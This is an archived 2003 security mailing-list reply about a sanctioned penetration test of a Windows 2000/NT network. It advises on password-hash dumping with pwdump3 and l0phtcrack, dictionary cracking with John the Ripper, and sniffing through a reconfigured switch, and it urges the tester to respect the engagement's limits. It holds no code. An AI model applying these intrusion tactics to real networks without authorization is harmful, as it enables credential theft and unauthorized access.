Re: penetration test in a Windows 2000/NT network

From: Anders Thulin (Anders.Thulinat_private)
Date: Mon May 26 2003 - 23:43:06 PDT

Next message: Alfred Huger: "SecurityFocus Article Announcement"

Previous message: Amal Al Hajeri: "Re: Pen test courses"
In reply to: heron heron: "penetration test in a Windows 2000/NT network"
Next in thread: H Carvey: "Re: penetration test in a Windows 2000/NT network"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

heron heron wrote:

> Is there a possibility on a Windows 2000 computers (physical access is possible)
> to attain admin rights without to overwrite the admin account. Background: I
> would like try to crack the password of the local admin (e.g. by means of pwdump
> and John). There ist the possibility that all admin passwords (also for the
> domain) is alike. 

   Get a copy of Hacking Exposed Windows 2000, and study it, if you haven't
already.

   Don't get stuck on getting admin rights, if user rights will do. If
the network happens to be switched, it may prove better to break into and
reconfigure a switch to give you all traffic for sniffing than to do arp
spoofing.

   Look for the easy ways first. It may be that you don't have to do
anything beyond cracking a user account, mounting a local share using
those credentials, and then try pwdump3/l0phtcrack. If the system isn't
well configured, you've won already. Or it may be that personal web server
is the way to do it. Or that the AD is wide open.

   Unless you have a *good* password dictionary, plan for a week of
cracking time, if you can. (Ordinary dictionaries are seldom useful
for password cracking -- generating specialized dictionaries is often
better.) L0phtcrack is still hopeless for serious dicitionary attacks
(unless it changed since lc4 was released) -- try john the ripper instead:
  at least you can script an attack starting from small dictionaries and
simple guesses to larger dictionaries and more complex guesses, interleaved
with incremental mode guessing.

> A further possibility at to come to information, would be the employment of a
> SMB Proxy. By ARP Spoofing it would be nevertheless theoretically possible to
> intercept the LM/NTLM(v1/v2) authentication . Then the attacker could itself
> instead announce at the server. Does it give there already such a Tool? 

   You are temporarily given the right to break into a network. What
responsibility goes with that right? Is there anything that *must*not*happen*?
(such as people panicking because they have found an intruder in their
system?) Make sure you know before you start. If DoS is a no-no, be careful
with attacks that may disrupt network traffic -- make sure you know them well
before you deploy them. Show time may not be a good time to test out new and
unfamiliar tools.

-- 
Anders Thulin   anders.thulinat_private   040-661 50 63	
Ki Consulting AB, Box 85, SE-201 20 Malmö, Sweden

---------------------------------------------------------------------------
----------------------------------------------------------------------------

Next message: Alfred Huger: "SecurityFocus Article Announcement"
Previous message: Amal Al Hajeri: "Re: Pen test courses"
In reply to: heron heron: "penetration test in a Windows 2000/NT network"
Next in thread: H Carvey: "Re: penetration test in a Windows 2000/NT network"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue May 27 2003 - 09:07:32 PDT